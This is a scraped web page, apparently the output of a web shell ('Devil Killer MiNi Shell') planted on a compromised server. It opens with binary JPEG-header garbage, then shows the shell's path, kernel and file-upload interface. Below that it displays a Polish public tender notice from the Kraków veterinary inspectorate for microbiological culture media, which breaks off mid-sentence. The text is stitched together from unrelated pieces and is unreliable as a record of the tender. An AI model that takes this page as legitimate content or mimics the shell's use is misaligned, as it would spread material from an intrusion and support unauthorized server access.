JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20250912/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20250912/0042183901-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Dostawy<br/> Dostawa podłoży mikrobiologicznych i suplementów </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzi podmiot, któremu powierzono przeprowadzenie postępowania</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Wojewódzki Inspektorat Weterynarii w Krakowie</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 000597280</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Józefa Brodowicza 13</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">30-965</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">(12) 293 10 00</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@wiw.krakow.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.wiw.krakow.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> realizacja zadań administracji publicznej z zakresu weterynarii, bezpieczeństwa żywności, zdrowia i ochrony zwierząt, weterynaryjnej ochrony zdrowia publicznego </p> <h3 class="mb-0">1.11.) Dane podmiotu, któremu zamawiający powierzył przeprowadzenie postępowania.</h3> <h3 class="p-2 mt-4 bg-light">Podmiot <span class="normal">1</span></h3> <h3 class="mb-0">1.11.1.) Nazwa podmiotu prowadzącego postępowanie: <span class="normal">Kancelaria Radców Prawnych Anna Studencka Dawid Studencki - Anna Studencka - Pełnomocnik Zamawiającego</span></h3> <h3 class="mb-0">1.11.2.) Krajowy Numer Identyfikacyjny: <span class="normal">NIP: 6751760157</span></h3> <h3 class="mb-0">Adres podmiotu prowadzącego postępowanie: </h3> <h3 class="mb-0">1.11.3.) Ulica: <span class="normal">Topolowa 31/1</span></h3> <h3 class="mb-0">1.11.4.) Miejscowość: <span class="normal">Kraków</span></h3> <h3 class="mb-0">1.11.5.) Kod pocztowy: <span class="normal">31-506</span></h3> <h3 class="mb-0">1.11.6.) Województwo: <span class="normal">małopolskie</span></h3> <h3 class="mb-0">1.11.7.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.11.8.) Lokalizacja NUTS 3: <span class="normal">PL213 - Miasto Kraków</span></h3> <h3 class="mb-0">1.11.11.) Adres poczty elektronicznej: <span class="normal">wiw@kancelariaasds.pl</span></h3> <h3 class="mb-0">1.11.12.) Adres strony internetowej: <span class="normal">kancelariaasds.pl</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Dostawa podłoży mikrobiologicznych i suplementów </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-c8a9741d-b114-4520-a40c-ec9647cc05c5</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00421839</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-09-12</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00089613/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.2.1 Dostawa podłoży mikrobiologicznych</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c8a9741d-b114-4520-a40c-ec9647cc05c5 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">10.1.	W postępowaniu o udzielenie zamówienia publicznego komunikacja między Zamawiającym a wykonawcami odbywa się przy użyciu Platformy e-Zamówienia, która jest dostępna pod adresem https://ezamowienia.gov.pl.<br/>10.2.	Korzystanie z Platformy e-Zamówienia jest bezpłatne.<br/>10.3.	Zamawiający wyznacza następujące osoby do kontaktu z wykonawcami: Pani Anna Studencka, e-mail: wiw@kancelariaasds.pl<br/>10.4.	Adres strony internetowej prowadzonego postępowania (link prowadzący bezpośrednio do widoku postępowania na Platformie e-Zamówienia): https://ezamowienia.gov.pl/mp-client/search/list/ocds-148610-c8a9741d-b114-4520-a40c-ec9647cc05c5<br/>10.5.	Postępowanie można wyszukać również ze strony głównej Platformy e-Zamówienia (przycisk „Przeglądaj postępowania/konkursy”). <br/>10.6.	Identyfikator (ID) postępowania na Platformie e-Zamówienia: ocds-148610-c8a9741d-b114-4520-a40c-ec9647cc05c5</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">10.7.	Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie e-Zamówienia. Szczegółowe informacje na temat zakładania kont podmiotów oraz zasady i warunki korzystania z Platformy e-Zamówienia określa Regulamin Platformy e-Zamówienia, dostępny na stronie internetowej https://ezamowienia.gov.pl oraz informacje zamieszczone w zakładce „Centrum Pomocy”. <br/>10.8.	Wykonawca dla pełnego korzystania z Platformy, w tym złożenia oferty, powinien oprócz rejestracji dokonać również aktywacji konta podmiotu oraz nadać pełne uprawnienia dla użytkowników. Interaktywne instrukcje dostępne są na stronie https://ezamowienia.gov.pl/pl/komponent-edukacyjny/.<br/>10.9.	Przeglądanie i pobieranie publicznej treści dokumentacji postępowania nie wymaga posiadania konta na Platformie e-Zamówienia ani logowania.<br/>10.10.	Sposób sporządzenia dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych.<br/><br/>10.14.	Komunikacja w postępowaniu, z wyłączeniem składania ofert w postępowaniu, odbywa się drogą elektroniczną za pośrednictwem formularzy do komunikacji dostępnych w zakładce „Formularze” („Formularze do komunikacji”). Za pośrednictwem „Formularzy do komunikacji” odbywa się w szczególności przekazywanie wezwań i zawiadomień, zadawanie pytań i udzielanie odpowiedzi. Formularze do komunikacji umożliwiają również dołączenie załącznika do przesyłanej wiadomości (przycisk „dodaj załącznik”). W przypadku załączników, które są zgodnie z ustawą Pzp lub rozporządzeniem Prezesa Rady Ministrów w sprawie wymagań dla dokumentów elektronicznych opatrzone kwalifikowanym podpisem elektronicznym, podpisem zaufanym lub podpisem osobistym, mogą być opatrzone, zgodnie z wyborem wykonawcy/wykonawcy wspólnie ubiegającego się o udzielenie zamówienia/podmiotu udostępniającego zasoby, podpisem typu zewnętrznego lub wewnętrznego. W zależności od rodzaju podpisu i jego typu (zewnętrzny, wewnętrzny) dodaje się uprzednio podpisane dokumenty wraz z wygenerowanym plikiem podpisu (typ zewnętrzny) lub dokument z wszytym podpisem (typ wewnętrzny).<br/>10.15.	Możliwość korzystania w postępowaniu z „Formularzy do komunikacji” w pełnym zakresie wymaga posiadania konta „Wykonawcy” na Platformie e-Zamówienia oraz zalogowania się na Platformie e-Zamówienia. Do korzystania z „Formularzy do komunikacji” służących do zadawania pytań dotyczących treści dokumentów zamówienia, wystarczające jest posiadanie tzw. konta uproszczonego na Platformie e-Zamówienia.<br/>10.16.	Wszystkie wysłane i odebrane w postępowaniu przez wykonawcę wiadomości widoczne są po zalogowaniu w podglądzie postępowania w zakładce „Komunikacja”.<br/>10.17.	Maksymalny rozmiar plików przesyłanych za pośrednictwem „Formularzy do komunikacji” wynosi 150 MB (wielkość ta dotyczy plików przesyłanych jako załączniki do jednego formularza).<br/>10.18.	Minimalne wymagania techniczne dotyczące sprzętu używanego w celu korzystania z usług Platformy e-Zamówienia oraz informacje dotyczące specyfikacji połączenia określa Regulamin Platformy e-Zamówienia.<br/>10.20.	Zamawiający nie przewiduje odstąpienia od użycia środków komunikacji elektronicznej.<br/>10.21.	W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia, Zamawiający dopuszcza również komunikację za pomocą poczty elektronicznej na adres e-mail: wiw@kancelariaasds.pl (nie dotyczy składania ofert/wniosków o dopuszczenie do udziału w postępowaniu).<br/><br/>13.3.	Ofertę należy przesłać na platformie e-zamówienia. <br/>13.4.	Ofertę składa się, pod rygorem nieważności, w postaci elektronicznej opatrzonej podpisem zaufanym, lub osobistym, lub w formie elektronicznej opatrzonej podpisem kwalifikowanym (art. 63 ust. 2 PZP).</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Zamawiający wymaga dołączenia katalogu elektronicznego do oferty</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">21.1.	Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia <br/>27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych <br/>i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z 04.05.2016, str. 1), dalej „RODO”, informuję, że: <br/>21.1.1.	administratorem Pani/Pana danych osobowych jest Wojewódzki Inspektorat Weterynarii w Krakowie, ul. Brodowicza 13, 30-965 Kraków 69, telefon: 12 2931000, adres strony www: www.wiw.krakow.pl;<br/>21.1.2.	kontakt z inspektorem ochrony danych osobowych Zamawiającego: adres e-mail: iodo@wiw.krakow.pl, telefon: 12 2931011, adres: Wojewódzki Inspektorat Weterynarii w Krakowie, ul. Brodowicza 13, 30-965 Kraków 69<br/>21.1.3.	Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu związanym z niniejszym postępowaniem o udzielenie zamówienia publicznego;<br/>21.1.4.	odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w oparciu o art. 8 oraz art. 96 ust. 3 ustawy Pzp; <br/>21.1.5.	Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 97 ust. 1 ustawy Pzp, przez okres <br/>4 lat od dnia zakończenia postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4 lata, okres przechowywania obejmuje cały czas trwania umowy – jednak nie krócej niż przez okres 2 lat od dnia 31 grudnia roku następującego po złożeniu do Komisji Europejskiej zestawienia wydatków, w którym ujęto ostateczne wydatki dotyczące zakończonego projektu współfinansowanego ze środków Unii Europejskiej. Dane te mogą być przechowywane przez okres dłuższy niż wskazany, o ile wynika to z ustawy z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (t.j. Dz.U. z 2018 r. poz. 217 z późn. zm.) i przepisów do tej ustawy.<br/>21.1.6.	obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem <br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp; <br/>21.1.7.	w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosowanie do art. 22 RODO;<br/>21.1.8.	posiada Pani/Pan:<br/>21.1.8.1.	na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>21.1.8.2.	na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych (Wyjaśnienie: skorzystanie z prawa do sprostowania nie może skutkować zmianą wyniku postępowania);<br/>21.1.8.3.	na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub państwa członkowskiego); <br/>21.1.8.4.	prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>21.1.9.	nie przysługuje Pani/Panu:<br/>21.1.9.1.	w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>21.1.9.2.	prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>21.1.9.3.	na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.<br/>Dalsza część klauzuli RODO znajduje się w pkt. 21 SWZ i nie została tutaj przytoczona ze względu na ograniczenie ilości znaków w formularzu ogłoszenia.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">WIW-AG.272.04.2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Dostawy</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">4</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem zamówienia jest dostawa podłoży mikrobiologicznych obejmująca:<br/>3.2.1.	W części 1 zamówienia dostawę podłoży sypkich i suplementów,<br/>3.3.	Szczegółowy Opis Przedmiotu Zamówienia zawierają załącznik nr 1 do SWZ oraz Projektowane postanowienia umowne załącznik nr 4 do SWZ. <br/>3.4.	Każdorazowo, w momencie dostawy danej partii towaru, Zamawiający zastrzega sobie możliwość sprawdzenia w obecności Wykonawcy czy towar nie jest wadliwy i w razie wątpliwości co do zgodności danej partii towaru z zapisami SWZ, Zamawiający zastrzega sobie możliwość nieprzyjęcia towaru i wezwania Wykonawcy do dostarczenia danej partii towaru w terminie pierwotnie ustalonym.<br/>3.5.	Przedmiot zamówienia musi być dopuszczony do obrotu zgodnie z obowiązującymi przepisami.<br/>3.6.	Dostawy dostarczane będą partiami na koszt Wykonawcy do Zakładu Higieny Weterynaryjnej w Krakowie, ul. Brodowicza 13b. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.	Ilości podłoży mikrobiologicznych i suplementów podane w Opisie przedmiotu zamówienia, będącym załącznikiem nr 1 do Umowy, stanowią wielkości szacunkowe maksymalne i mogą być w rzeczywistości mniejsze, w zależności od potrzeb ZAMAWIAJĄCEGO, co nie może stanowić podstawy do roszczeń ze strony WYKONAWCY z tytułu niezrealizowanej części umowy. Jednakże ZAMAWIAJĄCY zobowiązuje się do realizacji co najmniej 60% wielkości zamówienia dla każdej pozycji.<br/>4.	W przypadku, o którym mowa w ust. 3, WYKONAWCA może żądać wyłącznie wynagrodzenia należnego z tytułu wykonania części umowy.<br/><br/>2.	W przypadku niewykorzystania minimalnego poziomu zamówienia Umowa ulega przedłużeniu, do czasu jego osiągnięcia, nie dłużej jednak niż o 6 miesięcy. W momencie osiągnięcia realizacji zamówienia na minimalnym poziomie w przedłużonym okresie realizacji zamówienia, umowa wygaśnie. Przedłużenie okresu realizacji zamówienia nie wymaga sporządzenia aneksu do umowy. <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">12 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">17.1.	Kryteria oceny z podaniem wag punktowych poszczególnych kryteriów poniżej – LICZONE ODDZIELNIE DLA KAŻDEJ CZĘŚCI. <br/>Kryterium: Cena brutto wykonania zamówienia (Wc)<br/>Waga (pkt): 80<br/>Kryterium: Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia (Wd)<br/>Waga (pkt): 20<br/>17.2.	Sposób oceny ofert:<br/>17.2.1.	w kryterium cena oferty zostaną ocenione wg wzoru:<br/>Cena = Najniższa cena oferty spośród ofert nie podlegających odrzuceniu / Cena oferty ocenianej x 80 pkt<br/>17.2.2.	w kryterium czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia, oferty zostaną ocenione następująco:<br/>•	za deklarowany czas dostawy maksymalnie do 20 dni roboczych oferta otrzyma 20 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 25 dni roboczych oferta otrzyma 10 pkt,<br/>•	za deklarowany czas dostawy maksymalnie do 30 dni roboczych oferta otrzyma 0 pkt<br/>Oferta z deklarowanym maksymalnym czasem dostawy powyżej 30 dni z zostanie odrzucona jako niezgodna z SWZ. W razie braku wskazania w formularzu ofertowym deklarowanego czasu dostawy, Zamawiający uzna, że wykonawca oferuje maksymalny dopuszczalny czas dostawy tj. do 30 dni. Maksymalna liczba punktów w tym kryterium oceny ofert wynosi 20 pkt. <br/>17.3.	Przeliczenia dokonywane będą z dokładnością do dwóch miejsc po przecinku.<br/>17.4.	Jako najkorzystniejsza w danej części zamówienia zostanie uznana oferta z najwyższą łączną oceną (Wc+Wd) w wyżej wymienionych kryteriach oceny ofert.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Procentowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">80</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas dostawy każdej partii towaru, liczony od dnia złożenia zamówienia</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 3.2.	Przedmiotem zamówienia jest dostawa podłoży mikrobiologicznych obejmująca:<br/>3.2.2.	W części 2 zamówienia dostawę podłoży w formie granulatów i suplementów,<br/>3.3.	Szczegółowy Opis Przedmiotu Zamówienia zawierają załącznik nr 1 do SWZ oraz Projektowane postanowienia umowne załącznik nr 4 do SWZ. <br/>3.4.	Każdorazowo, w momencie dostawy danej partii towaru, Zamawiający zastrzega sobie możliwość sprawdzenia w obecności Wykonawcy czy towar nie jest wadliwy i w razie wątpliwości co do zgodności danej partii towaru z zapisami SWZ, Zamawiający zastrzega sobie możliwość nieprzyjęcia towaru i wezwania Wykonawcy do dostarczenia danej partii towaru w terminie pierwotnie ustalonym.<br/>3.5.	Przedmiot zamówienia musi być dopuszczony do obrotu zgodnie z obowiązującymi przepisami.<br/>3.6.	Dostawy dostarczane będą partiami na koszt Wykonawcy do Zakładu Higieny Weterynaryjnej w Krakowie, ul. Brodowicza 13b. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">33694000-1 - Czynniki diagnostyczne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.9) Rodzaj i maksymalna wartość opcji oraz okoliczności skorzystania z opcji: </h3> 3.	Ilości podłoży mikrobiologicznych i suplementów podane w 